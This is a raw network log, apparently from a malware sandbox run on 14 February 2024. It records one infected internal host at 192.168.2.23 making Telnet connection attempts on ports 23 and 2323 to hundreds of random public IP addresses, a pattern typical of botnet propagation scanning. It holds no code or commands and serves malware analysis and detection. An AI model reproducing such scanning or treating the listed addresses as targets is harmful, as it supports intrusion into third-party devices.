                                                            Feb 14, 2024 09:27:44.088325977 CET4069523192.168.2.23103.123.105.186
                                                            Feb 14, 2024 09:27:44.088323116 CET4069523192.168.2.23184.231.134.89
                                                            Feb 14, 2024 09:27:44.088325977 CET4069523192.168.2.2314.221.39.97
                                                            Feb 14, 2024 09:27:44.088330984 CET4069523192.168.2.23188.92.125.105
                                                            Feb 14, 2024 09:27:44.088330984 CET4069523192.168.2.23170.218.248.194
                                                            Feb 14, 2024 09:27:44.088330984 CET4069523192.168.2.23150.175.28.249
                                                            Feb 14, 2024 09:27:44.088330984 CET4069523192.168.2.23165.38.26.236
                                                            Feb 14, 2024 09:27:44.088332891 CET4069523192.168.2.2345.90.159.209
                                                            Feb 14, 2024 09:27:44.088339090 CET4069523192.168.2.23103.222.20.88
                                                            Feb 14, 2024 09:27:44.088339090 CET4069523192.168.2.2351.156.149.236
                                                            Feb 14, 2024 09:27:44.088347912 CET4069523192.168.2.23183.158.231.152
                                                            Feb 14, 2024 09:27:44.088347912 CET4069523192.168.2.23189.122.207.131
                                                            Feb 14, 2024 09:27:44.088350058 CET4069523192.168.2.23183.12.144.165
                                                            Feb 14, 2024 09:27:44.088350058 CET406952323192.168.2.2363.37.111.170
                                                            Feb 14, 2024 09:27:44.088350058 CET4069523192.168.2.23143.100.205.172
                                                            Feb 14, 2024 09:27:44.088350058 CET4069523192.168.2.23198.254.47.179
                                                            Feb 14, 2024 09:27:44.088356972 CET406952323192.168.2.23181.120.156.36
                                                            Feb 14, 2024 09:27:44.088356972 CET4069523192.168.2.23181.191.0.99
                                                            Feb 14, 2024 09:27:44.088366985 CET4069523192.168.2.23210.102.172.229
                                                            Feb 14, 2024 09:27:44.088366985 CET4069523192.168.2.23208.28.61.126
                                                            Feb 14, 2024 09:27:44.088367939 CET4069523192.168.2.2384.197.215.130
                                                            Feb 14, 2024 09:27:44.088367939 CET4069523192.168.2.23171.88.135.200
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.2366.83.246.153
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.2350.138.128.216
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.23185.50.17.21
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.23190.229.26.63
                                                            Feb 14, 2024 09:27:44.088375092 CET4069523192.168.2.23101.236.132.122
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.2380.169.182.127
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.23122.174.209.140
                                                            Feb 14, 2024 09:27:44.088372946 CET4069523192.168.2.23155.109.87.198
                                                            Feb 14, 2024 09:27:44.088382006 CET4069523192.168.2.2376.78.241.147
                                                            Feb 14, 2024 09:27:44.088382959 CET4069523192.168.2.2319.120.13.199
                                                            Feb 14, 2024 09:27:44.088387012 CET4069523192.168.2.23211.248.67.200
                                                            Feb 14, 2024 09:27:44.088392019 CET4069523192.168.2.2395.35.193.2
                                                            Feb 14, 2024 09:27:44.088396072 CET4069523192.168.2.23129.57.88.79
                                                            Feb 14, 2024 09:27:44.088396072 CET4069523192.168.2.23157.7.103.207
                                                            Feb 14, 2024 09:27:44.088396072 CET4069523192.168.2.23208.51.63.191
                                                            Feb 14, 2024 09:27:44.088396072 CET4069523192.168.2.2373.87.102.126
                                                            Feb 14, 2024 09:27:44.088396072 CET406952323192.168.2.2358.146.112.142
                                                            Feb 14, 2024 09:27:44.088397980 CET4069523192.168.2.2346.77.70.109
                                                            Feb 14, 2024 09:27:44.088407040 CET4069523192.168.2.2365.245.42.214
                                                            Feb 14, 2024 09:27:44.088407040 CET4069523192.168.2.232.192.25.46
                                                            Feb 14, 2024 09:27:44.088413954 CET4069523192.168.2.231.25.153.65
                                                            Feb 14, 2024 09:27:44.088421106 CET4069523192.168.2.23188.53.0.64
                                                            Feb 14, 2024 09:27:44.088428974 CET406952323192.168.2.2393.202.155.110
                                                            Feb 14, 2024 09:27:44.088433981 CET4069523192.168.2.23107.167.106.238
                                                            Feb 14, 2024 09:27:44.088438988 CET4069523192.168.2.23195.5.179.171
                                                            Feb 14, 2024 09:27:44.088439941 CET4069523192.168.2.23103.133.15.202
                                                            Feb 14, 2024 09:27:44.088448048 CET4069523192.168.2.23175.27.216.110
                                                            Feb 14, 2024 09:27:44.088454008 CET4069523192.168.2.23186.160.24.228
                                                            Feb 14, 2024 09:27:44.088464975 CET4069523192.168.2.23139.196.182.235
                                                            Feb 14, 2024 09:27:44.088468075 CET4069523192.168.2.2364.185.241.64
                                                            Feb 14, 2024 09:27:44.088468075 CET406952323192.168.2.2367.124.12.97
                                                            Feb 14, 2024 09:27:44.088470936 CET4069523192.168.2.23167.215.230.51
                                                            Feb 14, 2024 09:27:44.088470936 CET4069523192.168.2.2340.184.139.172
                                                            Feb 14, 2024 09:27:44.088470936 CET4069523192.168.2.23153.117.53.213
                                                            Feb 14, 2024 09:27:44.088471889 CET4069523192.168.2.23212.219.141.38
                                                            Feb 14, 2024 09:27:44.088471889 CET4069523192.168.2.23191.115.184.77
                                                            Feb 14, 2024 09:27:44.088473082 CET4069523192.168.2.23106.31.30.68
                                                            Feb 14, 2024 09:27:44.088474989 CET4069523192.168.2.2339.77.38.10
                                                            Feb 14, 2024 09:27:44.088481903 CET4069523192.168.2.2389.82.71.247
                                                            Feb 14, 2024 09:27:44.088490963 CET4069523192.168.2.2354.18.53.85
                                                            Feb 14, 2024 09:27:44.088490963 CET4069523192.168.2.234.219.204.203
                                                            Feb 14, 2024 09:27:44.088501930 CET406952323192.168.2.23111.119.185.167
                                                            Feb 14, 2024 09:27:44.088511944 CET4069523192.168.2.23164.189.120.132
                                                            Feb 14, 2024 09:27:44.088515997 CET4069523192.168.2.23184.30.200.7
                                                            Feb 14, 2024 09:27:44.088517904 CET4069523192.168.2.2339.62.129.134
                                                            Feb 14, 2024 09:27:44.088517904 CET4069523192.168.2.23141.74.191.123
                                                            Feb 14, 2024 09:27:44.088517904 CET4069523192.168.2.23195.206.174.83
                                                            Feb 14, 2024 09:27:44.088520050 CET4069523192.168.2.23212.0.5.45
                                                            Feb 14, 2024 09:27:44.088521004 CET4069523192.168.2.23189.247.35.49
                                                            Feb 14, 2024 09:27:44.088529110 CET4069523192.168.2.2359.194.1.204
                                                            Feb 14, 2024 09:27:44.088538885 CET4069523192.168.2.23103.1.73.1
                                                            Feb 14, 2024 09:27:44.088542938 CET4069523192.168.2.23181.90.172.129
                                                            Feb 14, 2024 09:27:44.088548899 CET4069523192.168.2.2360.212.95.26
                                                            Feb 14, 2024 09:27:44.088551044 CET406952323192.168.2.2323.112.43.89
                                                            Feb 14, 2024 09:27:44.088561058 CET4069523192.168.2.2327.123.156.222
                                                            Feb 14, 2024 09:27:44.088563919 CET4069523192.168.2.23170.110.188.171
                                                            Feb 14, 2024 09:27:44.088563919 CET4069523192.168.2.23204.10.120.151
                                                            Feb 14, 2024 09:27:44.088570118 CET4069523192.168.2.2353.35.166.56
                                                            Feb 14, 2024 09:27:44.088572025 CET4069523192.168.2.2376.146.73.64
                                                            Feb 14, 2024 09:27:44.088578939 CET4069523192.168.2.2372.12.106.95
                                                            Feb 14, 2024 09:27:44.088582993 CET4069523192.168.2.23178.114.206.199
                                                            Feb 14, 2024 09:27:44.088582993 CET4069523192.168.2.2375.39.167.137
                                                            Feb 14, 2024 09:27:44.088593006 CET4069523192.168.2.23218.69.214.18
                                                            Feb 14, 2024 09:27:44.088593006 CET406952323192.168.2.2312.129.6.39
                                                            Feb 14, 2024 09:27:44.088596106 CET4069523192.168.2.23209.175.66.205
                                                            Feb 14, 2024 09:27:44.088612080 CET4069523192.168.2.23150.151.112.22
                                                            Feb 14, 2024 09:27:44.088612080 CET4069523192.168.2.23193.127.244.137
                                                            Feb 14, 2024 09:27:44.088617086 CET4069523192.168.2.23182.250.111.117
                                                            Feb 14, 2024 09:27:44.088617086 CET4069523192.168.2.2334.190.55.184
                                                            Feb 14, 2024 09:27:44.088622093 CET4069523192.168.2.23197.103.74.221
                                                            Feb 14, 2024 09:27:44.088630915 CET4069523192.168.2.23148.197.171.247
                                                            Feb 14, 2024 09:27:44.088630915 CET4069523192.168.2.23126.162.19.56
                                                            Feb 14, 2024 09:27:44.088634014 CET4069523192.168.2.2376.151.51.36
                                                            Feb 14, 2024 09:27:44.088634968 CET406952323192.168.2.23154.51.7.251
                                                            Feb 14, 2024 09:27:44.088644028 CET4069523192.168.2.23136.180.8.48
                                                            Feb 14, 2024 09:27:44.088644028 CET4069523192.168.2.2394.78.237.191
                                                            Feb 14, 2024 09:27:44.088649035 CET4069523192.168.2.2373.250.234.10
                                                            Feb 14, 2024 09:27:44.088649035 CET4069523192.168.2.23161.38.195.206
                                                            Feb 14, 2024 09:27:44.088659048 CET4069523192.168.2.2390.206.51.120
                                                            Feb 14, 2024 09:27:44.088670969 CET4069523192.168.2.2332.39.51.179
                                                            Feb 14, 2024 09:27:44.088674068 CET4069523192.168.2.2336.55.115.37
                                                            Feb 14, 2024 09:27:44.088680029 CET4069523192.168.2.23205.240.252.203
                                                            Feb 14, 2024 09:27:44.088680029 CET4069523192.168.2.2324.26.207.43
                                                            Feb 14, 2024 09:27:44.088680029 CET406952323192.168.2.2346.149.152.108
                                                            Feb 14, 2024 09:27:44.088684082 CET4069523192.168.2.23183.180.107.247
                                                            Feb 14, 2024 09:27:44.088689089 CET4069523192.168.2.2351.248.3.194
                                                            Feb 14, 2024 09:27:44.088692904 CET4069523192.168.2.23108.192.72.27
                                                            Feb 14, 2024 09:27:44.088701963 CET4069523192.168.2.23136.155.123.125
                                                            Feb 14, 2024 09:27:44.088701963 CET4069523192.168.2.2325.101.55.241
                                                            Feb 14, 2024 09:27:44.088704109 CET4069523192.168.2.23157.145.121.12
                                                            Feb 14, 2024 09:27:44.088716030 CET4069523192.168.2.23196.216.180.59
                                                            Feb 14, 2024 09:27:44.088716984 CET4069523192.168.2.2357.150.186.209
                                                            Feb 14, 2024 09:27:44.088725090 CET4069523192.168.2.2351.12.178.169
                                                            Feb 14, 2024 09:27:44.088725090 CET4069523192.168.2.2391.201.112.0
                                                            Feb 14, 2024 09:27:44.088730097 CET4069523192.168.2.2381.157.183.113
                                                            Feb 14, 2024 09:27:44.088731050 CET406952323192.168.2.2358.198.238.180
                                                            Feb 14, 2024 09:27:44.088732958 CET4069523192.168.2.23201.192.137.179
                                                            Feb 14, 2024 09:27:44.088736057 CET4069523192.168.2.2336.40.227.252
                                                            Feb 14, 2024 09:27:44.088737011 CET4069523192.168.2.2359.100.181.247
                                                            Feb 14, 2024 09:27:44.088738918 CET4069523192.168.2.23220.111.222.81
                                                            Feb 14, 2024 09:27:44.088752985 CET4069523192.168.2.2349.186.170.94
                                                            Feb 14, 2024 09:27:44.088752985 CET4069523192.168.2.23195.111.201.84
                                                            Feb 14, 2024 09:27:44.088762045 CET4069523192.168.2.2384.32.64.57
                                                            Feb 14, 2024 09:27:44.088763952 CET4069523192.168.2.23203.18.21.106
                                                            Feb 14, 2024 09:27:44.088763952 CET4069523192.168.2.23187.8.141.229
                                                            Feb 14, 2024 09:27:44.088768959 CET4069523192.168.2.23102.202.157.6
                                                            Feb 14, 2024 09:27:44.088768959 CET4069523192.168.2.2331.17.20.142
                                                            Feb 14, 2024 09:27:44.088769913 CET406952323192.168.2.23141.248.26.20
                                                            Feb 14, 2024 09:27:44.088778973 CET4069523192.168.2.23130.113.206.84
                                                            Feb 14, 2024 09:27:44.088781118 CET4069523192.168.2.2342.179.48.135
                                                            Feb 14, 2024 09:27:44.088781118 CET4069523192.168.2.2399.209.226.98
                                                            Feb 14, 2024 09:27:44.088784933 CET4069523192.168.2.23123.253.31.103
                                                            Feb 14, 2024 09:27:44.088784933 CET406952323192.168.2.2380.14.206.162
                                                            Feb 14, 2024 09:27:44.088794947 CET4069523192.168.2.23142.127.221.43
                                                            Feb 14, 2024 09:27:44.088794947 CET4069523192.168.2.2377.208.11.250
                                                            Feb 14, 2024 09:27:44.088797092 CET4069523192.168.2.23188.227.235.91
                                                            Feb 14, 2024 09:27:44.088799000 CET4069523192.168.2.23193.120.87.248
                                                            Feb 14, 2024 09:27:44.088810921 CET4069523192.168.2.23107.108.76.188
                                                            Feb 14, 2024 09:27:44.088812113 CET4069523192.168.2.2343.9.48.53
                                                            Feb 14, 2024 09:27:44.088824987 CET4069523192.168.2.2314.207.28.38
                                                            Feb 14, 2024 09:27:44.088835955 CET4069523192.168.2.23166.210.108.104
                                                            Feb 14, 2024 09:27:44.088835955 CET4069523192.168.2.2360.158.24.251
                                                            Feb 14, 2024 09:27:44.088835955 CET406952323192.168.2.23158.31.254.207
                                                            Feb 14, 2024 09:27:44.088844061 CET4069523192.168.2.2324.210.249.104
                                                            Feb 14, 2024 09:27:44.088844061 CET4069523192.168.2.23211.194.77.121
                                                            Feb 14, 2024 09:27:44.088844061 CET4069523192.168.2.23133.49.95.68
                                                            Feb 14, 2024 09:27:44.088850975 CET4069523192.168.2.23157.200.197.104
                                                            Feb 14, 2024 09:27:44.088859081 CET4069523192.168.2.2383.118.16.221
                                                            Feb 14, 2024 09:27:44.088866949 CET4069523192.168.2.23132.171.213.144
                                                            Feb 14, 2024 09:27:44.088870049 CET4069523192.168.2.23147.141.97.235
                                                            Feb 14, 2024 09:27:44.088875055 CET4069523192.168.2.2385.95.138.87
                                                            Feb 14, 2024 09:27:44.088879108 CET4069523192.168.2.23132.152.9.100
                                                            Feb 14, 2024 09:27:44.088893890 CET406952323192.168.2.2390.108.64.78
                                                            Feb 14, 2024 09:27:44.088895082 CET4069523192.168.2.23135.10.90.249
                                                            Feb 14, 2024 09:27:44.088895082 CET4069523192.168.2.2376.226.119.67
                                                            Feb 14, 2024 09:27:44.088896036 CET4069523192.168.2.23218.104.93.231
                                                            Feb 14, 2024 09:27:44.088910103 CET4069523192.168.2.23195.114.116.228
                                                            Feb 14, 2024 09:27:44.088920116 CET4069523192.168.2.2362.72.85.173
                                                            Feb 14, 2024 09:27:44.088927984 CET4069523192.168.2.23106.93.137.15
                                                            Feb 14, 2024 09:27:44.088927984 CET4069523192.168.2.23221.83.36.31
                                                            Feb 14, 2024 09:27:44.088928938 CET4069523192.168.2.23205.136.104.244
                                                            Feb 14, 2024 09:27:44.088928938 CET406952323192.168.2.23186.7.141.134
                                                            Feb 14, 2024 09:27:44.088932991 CET4069523192.168.2.2370.226.179.196
                                                            Feb 14, 2024 09:27:44.088932991 CET4069523192.168.2.2323.125.73.89
                                                            Feb 14, 2024 09:27:44.088932991 CET4069523192.168.2.23164.178.144.10
                                                            Feb 14, 2024 09:27:44.088938951 CET4069523192.168.2.23210.102.104.28
                                                            Feb 14, 2024 09:27:44.088943958 CET4069523192.168.2.2332.105.242.185
                                                            Feb 14, 2024 09:27:44.088948965 CET4069523192.168.2.2385.124.137.199
                                                            Feb 14, 2024 09:27:44.088951111 CET4069523192.168.2.23155.237.163.164
                                                            Feb 14, 2024 09:27:44.088968039 CET4069523192.168.2.239.32.87.246
                                                            Feb 14, 2024 09:27:44.088968039 CET4069523192.168.2.23208.99.174.227
                                                            Feb 14, 2024 09:27:44.088979006 CET4069523192.168.2.2344.224.213.71
                                                            Feb 14, 2024 09:27:44.088979006 CET4069523192.168.2.2380.21.239.255
                                                            Feb 14, 2024 09:27:44.088982105 CET4069523192.168.2.23185.125.104.252
                                                            Feb 14, 2024 09:27:44.088994026 CET406952323192.168.2.2335.200.22.238
                                                            Feb 14, 2024 09:27:44.088994026 CET4069523192.168.2.23171.10.90.86
                                                            Feb 14, 2024 09:27:44.089005947 CET4069523192.168.2.2374.236.123.78
                                                            Feb 14, 2024 09:27:44.089005947 CET4069523192.168.2.23207.128.253.55
                                                            Feb 14, 2024 09:27:44.089020967 CET4069523192.168.2.23176.30.140.40
                                                            Feb 14, 2024 09:27:44.089021921 CET4069523192.168.2.2363.61.185.38
                                                            Feb 14, 2024 09:27:44.089027882 CET4069523192.168.2.23115.242.87.200
                                                            Feb 14, 2024 09:27:44.089029074 CET4069523192.168.2.2388.39.70.19
                                                            Feb 14, 2024 09:27:44.089030981 CET4069523192.168.2.2381.143.70.32
                                                            Feb 14, 2024 09:27:44.089030981 CET4069523192.168.2.23100.181.98.0
                                                            Feb 14, 2024 09:27:44.089050055 CET4069523192.168.2.2344.243.108.237
                                                            Feb 14, 2024 09:27:44.089051962 CET406952323192.168.2.23113.22.246.199
                                                            Feb 14, 2024 09:27:44.089052916 CET4069523192.168.2.2340.19.236.12
                                                            Feb 14, 2024 09:27:44.089052916 CET4069523192.168.2.23190.10.178.220
                                                            Feb 14, 2024 09:27:44.089054108 CET4069523192.168.2.23218.5.168.45
                                                            Feb 14, 2024 09:27:44.089060068 CET4069523192.168.2.23134.40.139.121
                                                            Feb 14, 2024 09:27:44.089060068 CET4069523192.168.2.2367.205.73.218
                                                            Feb 14, 2024 09:27:44.089066029 CET4069523192.168.2.234.111.230.8
                                                            Feb 14, 2024 09:27:44.089076996 CET4069523192.168.2.23117.158.50.55
                                                            Feb 14, 2024 09:27:44.089085102 CET406952323192.168.2.2360.45.60.105
                                                            Feb 14, 2024 09:27:44.089090109 CET4069523192.168.2.23155.253.128.250
                                                            Feb 14, 2024 09:27:44.089097977 CET4069523192.168.2.23204.92.201.234
                                                            Feb 14, 2024 09:27:44.089099884 CET4069523192.168.2.23121.163.127.59
                                                            Feb 14, 2024 09:27:44.089114904 CET4069523192.168.2.2359.133.229.2
                                                            Feb 14, 2024 09:27:44.089116096 CET4069523192.168.2.2340.192.136.117
                                                            Feb 14, 2024 09:27:44.089116096 CET4069523192.168.2.2351.227.35.35
                                                            Feb 14, 2024 09:27:44.089118958 CET4069523192.168.2.23171.131.226.173
                                                            Feb 14, 2024 09:27:44.089124918 CET4069523192.168.2.2324.28.141.65
                                                            Feb 14, 2024 09:27:44.089126110 CET4069523192.168.2.23221.87.93.123
                                                            Feb 14, 2024 09:27:44.089137077 CET406952323192.168.2.23121.247.196.42
                                                            Feb 14, 2024 09:27:44.089137077 CET4069523192.168.2.23163.186.101.41
                                                            Feb 14, 2024 09:27:44.089145899 CET4069523192.168.2.2348.98.160.37
                                                            Feb 14, 2024 09:27:44.089162111 CET4069523192.168.2.232.122.103.128
                                                            Feb 14, 2024 09:27:44.089162111 CET4069523192.168.2.23131.61.8.39
                                                            Feb 14, 2024 09:27:44.089165926 CET4069523192.168.2.23209.144.160.31
                                                            Feb 14, 2024 09:27:44.089173079 CET4069523192.168.2.2312.143.181.110
                                                            Feb 14, 2024 09:27:44.089183092 CET4069523192.168.2.2373.13.209.162
                                                            Feb 14, 2024 09:27:44.089183092 CET4069523192.168.2.23113.233.164.187
                                                            Feb 14, 2024 09:27:44.089185953 CET4069523192.168.2.2370.105.82.8
                                                            Feb 14, 2024 09:27:44.089188099 CET4069523192.168.2.2359.220.195.120
                                                            Feb 14, 2024 09:27:44.089190006 CET4069523192.168.2.23102.97.16.84
                                                            Feb 14, 2024 09:27:44.089205027 CET4069523192.168.2.2381.15.168.112
                                                            Feb 14, 2024 09:27:44.089214087 CET406952323192.168.2.23193.121.124.18
                                                            Feb 14, 2024 09:27:44.089214087 CET4069523192.168.2.2370.41.49.49
                                                            Feb 14, 2024 09:27:44.089214087 CET4069523192.168.2.2384.13.200.106
                                                            Feb 14, 2024 09:27:44.089226961 CET4069523192.168.2.23177.67.104.192
                                                            Feb 14, 2024 09:27:44.089230061 CET406952323192.168.2.23186.241.158.152
                                                            Feb 14, 2024 09:27:44.089232922 CET4069523192.168.2.23129.65.192.136
                                                            Feb 14, 2024 09:27:44.089241028 CET4069523192.168.2.23134.237.114.201
                                                            Feb 14, 2024 09:27:44.089241028 CET4069523192.168.2.23149.145.87.170
                                                            Feb 14, 2024 09:27:44.089241028 CET4069523192.168.2.2394.48.2.38
                                                            Feb 14, 2024 09:27:44.089246035 CET4069523192.168.2.2349.167.45.95
                                                            Feb 14, 2024 09:27:44.089256048 CET4069523192.168.2.2314.61.147.213
                                                            Feb 14, 2024 09:27:44.089256048 CET4069523192.168.2.2390.140.178.96
                                                            Feb 14, 2024 09:27:44.089266062 CET4069523192.168.2.23220.133.172.96
                                                            Feb 14, 2024 09:27:44.089266062 CET4069523192.168.2.23139.150.108.236
                                                            Feb 14, 2024 09:27:44.089281082 CET4069523192.168.2.239.194.202.74
                                                            Feb 14, 2024 09:27:44.089288950 CET4069523192.168.2.2320.174.141.99
                                                            Feb 14, 2024 09:27:44.089289904 CET4069523192.168.2.2327.203.148.179
                                                            Feb 14, 2024 09:27:44.089289904 CET406952323192.168.2.2340.77.70.75
                                                            Feb 14, 2024 09:27:44.089291096 CET4069523192.168.2.2397.244.65.80
                                                            Feb 14, 2024 09:27:44.089319944 CET4069523192.168.2.23221.242.165.51
                                                            Feb 14, 2024 09:27:44.089319944 CET4069523192.168.2.23176.147.133.240
                                                            Feb 14, 2024 09:27:44.089319944 CET4069523192.168.2.2350.193.224.132
                                                            Feb 14, 2024 09:27:44.089322090 CET4069523192.168.2.23218.81.175.200
                                                            Feb 14, 2024 09:27:44.089322090 CET4069523192.168.2.23138.117.74.125
                                                            Feb 14, 2024 09:27:44.089334011 CET4069523192.168.2.2349.189.254.97
                                                            Feb 14, 2024 09:27:44.089334011 CET4069523192.168.2.2380.225.237.25
                                                            Feb 14, 2024 09:27:44.089344025 CET4069523192.168.2.23220.45.148.124
                                                            Feb 14, 2024 09:27:44.089346886 CET4069523192.168.2.2339.116.0.138
                                                            Feb 14, 2024 09:27:44.089346886 CET406952323192.168.2.23134.49.238.125
                                                            Feb 14, 2024 09:27:44.089348078 CET4069523192.168.2.235.164.110.145
                                                            Feb 14, 2024 09:27:44.089350939 CET4069523192.168.2.2359.99.199.196
                                                            Feb 14, 2024 09:27:44.089363098 CET4069523192.168.2.2312.92.219.113
                                                            Feb 14, 2024 09:27:44.089363098 CET4069523192.168.2.23110.154.163.160
                                                            Feb 14, 2024 09:27:44.089369059 CET4069523192.168.2.2332.217.218.70
                                                            Feb 14, 2024 09:27:44.089369059 CET4069523192.168.2.23179.108.124.178
                                                            Feb 14, 2024 09:27:44.089380980 CET4069523192.168.2.23133.237.19.153
                                                            Feb 14, 2024 09:27:44.089382887 CET4069523192.168.2.23207.29.247.201
                                                            Feb 14, 2024 09:27:44.089395046 CET4069523192.168.2.2363.129.214.119
                                                            Feb 14, 2024 09:27:44.089406967 CET406952323192.168.2.23168.227.3.18
                                                            Feb 14, 2024 09:27:44.089406967 CET4069523192.168.2.23185.142.223.94
                                                            Feb 14, 2024 09:27:44.089411974 CET4069523192.168.2.2350.60.106.238
                                                            Feb 14, 2024 09:27:44.089416027 CET4069523192.168.2.2353.192.107.103
                                                            Feb 14, 2024 09:27:44.089416027 CET4069523192.168.2.23177.182.57.173
                                                            Feb 14, 2024 09:27:44.089416981 CET4069523192.168.2.2339.92.227.247
                                                            Feb 14, 2024 09:27:44.089417934 CET406952323192.168.2.23193.122.209.124
                                                            Feb 14, 2024 09:27:44.089416981 CET4069523192.168.2.23155.129.172.18
                                                            Feb 14, 2024 09:27:44.089425087 CET4069523192.168.2.2334.241.147.59
                                                            Feb 14, 2024 09:27:44.089425087 CET4069523192.168.2.23124.55.54.121
                                                            Feb 14, 2024 09:27:44.089425087 CET4069523192.168.2.2380.205.93.101
                                                            Feb 14, 2024 09:27:44.089432001 CET4069523192.168.2.23103.209.242.12
                                                            Feb 14, 2024 09:27:44.089432955 CET4069523192.168.2.23186.60.145.250
                                                            Feb 14, 2024 09:27:44.089432955 CET4069523192.168.2.23161.11.221.42
                                                            Feb 14, 2024 09:27:44.089435101 CET4069523192.168.2.23101.186.118.243
                                                            Feb 14, 2024 09:27:44.089436054 CET4069523192.168.2.2378.133.169.17
                                                            Feb 14, 2024 09:27:44.089436054 CET4069523192.168.2.23171.70.44.37
                                                            Feb 14, 2024 09:27:44.089441061 CET4069523192.168.2.2341.2.80.77
                                                            Feb 14, 2024 09:27:44.089447021 CET4069523192.168.2.2364.35.105.113
                                                            Feb 14, 2024 09:27:44.089452982 CET406952323192.168.2.23203.57.158.166
                                                            Feb 14, 2024 09:27:44.089454889 CET4069523192.168.2.2314.170.30.130
                                                            Feb 14, 2024 09:27:44.089461088 CET4069523192.168.2.2336.124.249.117
                                                            Feb 14, 2024 09:27:44.089469910 CET4069523192.168.2.2369.144.1.228
                                                            Feb 14, 2024 09:27:44.089473963 CET4069523192.168.2.23194.39.117.216
                                                            Feb 14, 2024 09:27:44.089484930 CET4069523192.168.2.23184.121.34.182
                                                            Feb 14, 2024 09:27:44.089484930 CET4069523192.168.2.23134.170.116.84
                                                            Feb 14, 2024 09:27:44.089484930 CET4069523192.168.2.23180.251.65.229
                                                            Feb 14, 2024 09:27:44.089495897 CET4069523192.168.2.2347.136.189.18
                                                            Feb 14, 2024 09:27:44.089500904 CET4069523192.168.2.23114.160.202.50
                                                            Feb 14, 2024 09:27:44.089508057 CET4069523192.168.2.2324.207.229.111
                                                            Feb 14, 2024 09:27:44.089512110 CET4069523192.168.2.23111.197.150.82
                                                            Feb 14, 2024 09:27:44.089512110 CET4069523192.168.2.2382.78.187.102
                                                            Feb 14, 2024 09:27:44.089520931 CET4069523192.168.2.23110.70.6.60
                                                            Feb 14, 2024 09:27:44.089524984 CET4069523192.168.2.2362.38.135.144
                                                            Feb 14, 2024 09:27:44.089524984 CET4069523192.168.2.23209.171.74.39
                                                            Feb 14, 2024 09:27:44.089526892 CET406952323192.168.2.23119.70.63.126
                                                            Feb 14, 2024 09:27:44.089533091 CET4069523192.168.2.23123.181.249.74
                                                            Feb 14, 2024 09:27:44.089538097 CET4069523192.168.2.2371.146.230.94
                                                            Feb 14, 2024 09:27:44.089543104 CET4069523192.168.2.2354.125.200.182
                                                            Feb 14, 2024 09:27:44.089543104 CET406952323192.168.2.23132.190.120.0
                                                            Feb 14, 2024 09:27:44.089551926 CET4069523192.168.2.2392.40.74.46
                                                            Feb 14, 2024 09:27:44.089554071 CET4069523192.168.2.23193.152.152.132
                                                            Feb 14, 2024 09:27:44.089565039 CET4069523192.168.2.23149.91.127.80
                                                            Feb 14, 2024 09:27:44.089572906 CET4069523192.168.2.23113.125.141.37
                                                            Feb 14, 2024 09:27:44.089586020 CET4069523192.168.2.23161.189.40.96
                                                            Feb 14, 2024 09:27:44.089587927 CET4069523192.168.2.2320.74.228.139
                                                            Feb 14, 2024 09:27:44.089589119 CET4069523192.168.2.23115.255.99.0
                                                            Feb 14, 2024 09:27:44.089601040 CET4069523192.168.2.2398.15.10.164
                                                            Feb 14, 2024 09:27:44.089603901 CET4069523192.168.2.235.64.20.129
                                                            Feb 14, 2024 09:27:44.089607954 CET4069523192.168.2.2358.204.154.196
                                                            Feb 14, 2024 09:27:44.089612007 CET406952323192.168.2.2378.170.114.92
                                                            Feb 14, 2024 09:27:44.089620113 CET4069523192.168.2.23150.143.166.104
                                                            Feb 14, 2024 09:27:44.089628935 CET4069523192.168.2.23128.229.162.183
                                                            Feb 14, 2024 09:27:44.089629889 CET4069523192.168.2.23108.191.75.108
                                                            Feb 14, 2024 09:27:44.089634895 CET4069523192.168.2.23203.172.15.220
                                                            Feb 14, 2024 09:27:44.089634895 CET4069523192.168.2.2354.2.79.230
                                                            Feb 14, 2024 09:27:44.089636087 CET4069523192.168.2.23189.133.188.49
                                                            Feb 14, 2024 09:27:44.089636087 CET4069523192.168.2.23174.135.246.199
                                                            Feb 14, 2024 09:27:44.089638948 CET4069523192.168.2.23136.150.22.20
                                                            Feb 14, 2024 09:27:44.089638948 CET4069523192.168.2.23205.215.46.28
                                                            Feb 14, 2024 09:27:44.089642048 CET4069523192.168.2.2347.176.135.34
                                                            Feb 14, 2024 09:27:44.089656115 CET406952323192.168.2.23160.72.107.23
                                                            Feb 14, 2024 09:27:44.089656115 CET4069523192.168.2.23122.215.148.238
                                                            Feb 14, 2024 09:27:44.089663982 CET4069523192.168.2.239.34.59.207
                                                            Feb 14, 2024 09:27:44.089663982 CET4069523192.168.2.23100.221.134.33
                                                            Feb 14, 2024 09:27:44.089678049 CET4069523192.168.2.2312.179.56.245
                                                            Feb 14, 2024 09:27:44.089684963 CET406952323192.168.2.23125.137.190.202
                                                            Feb 14, 2024 09:27:44.089689016 CET4069523192.168.2.23193.143.97.9
                                                            Feb 14, 2024 09:27:44.089689970 CET4069523192.168.2.23121.100.229.133
                                                            Feb 14, 2024 09:27:44.089690924 CET4069523192.168.2.23154.211.202.39
                                                            Feb 14, 2024 09:27:44.089692116 CET4069523192.168.2.23100.208.49.247
                                                            Feb 14, 2024 09:27:44.089692116 CET4069523192.168.2.23134.162.115.46
                                                            Feb 14, 2024 09:27:44.089701891 CET4069523192.168.2.2313.138.141.148
                                                            Feb 14, 2024 09:27:44.089708090 CET4069523192.168.2.23108.24.166.69
                                                            Feb 14, 2024 09:27:44.089708090 CET4069523192.168.2.2373.235.5.39
                                                            Feb 14, 2024 09:27:44.089713097 CET4069523192.168.2.23135.72.241.108
                                                            Feb 14, 2024 09:27:44.089725971 CET4069523192.168.2.23222.151.49.72
                                                            Feb 14, 2024 09:27:44.089728117 CET4069523192.168.2.23192.42.37.189
                                                            Feb 14, 2024 09:27:44.089729071 CET4069523192.168.2.2358.92.131.255
                                                            Feb 14, 2024 09:27:44.089745998 CET4069523192.168.2.23149.145.41.135
                                                            Feb 14, 2024 09:27:44.089751959 CET406952323192.168.2.2319.35.124.121
                                                            Feb 14, 2024 09:27:44.089751959 CET4069523192.168.2.2349.125.75.133
                                                            Feb 14, 2024 09:27:44.089751959 CET4069523192.168.2.23158.204.198.100
                                                            Feb 14, 2024 09:27:44.089751959 CET4069523192.168.2.23197.65.10.240
                                                            Feb 14, 2024 09:27:44.089770079 CET4069523192.168.2.235.146.88.45
